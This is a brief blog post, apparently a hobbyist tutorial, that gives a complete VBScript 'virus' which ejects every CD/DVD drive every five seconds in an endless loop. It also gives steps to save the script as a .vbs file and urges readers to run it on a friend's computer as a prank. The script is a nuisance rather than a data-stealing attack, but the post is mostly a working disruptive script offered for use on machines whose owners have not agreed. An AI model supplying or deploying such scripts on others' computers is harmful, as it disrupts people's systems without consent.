Breaking News
recent

Auto DVD/CD Ejecting Virus

Hi friends today i would like to show you that how to make Auto DVD/CD Ejecting Virus. It is very funny and auto running virus. It eject your DVD/CD drive. Juts follow with me to make this Virus.

First of all press windows + R to open Run.
Then type notepad and press enter key.


It will open then notepad. 
After it's open type this simple code.
"Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop"


After typed the code.
Click on file then save as.


Save that as .vbs, type your required name .vbs remember without vbs it won't work. 
So save it as .vbs and enjoy the virus with your friends computer.
Unknown

Unknown

No comments:

Post a Comment

Powered by Blogger.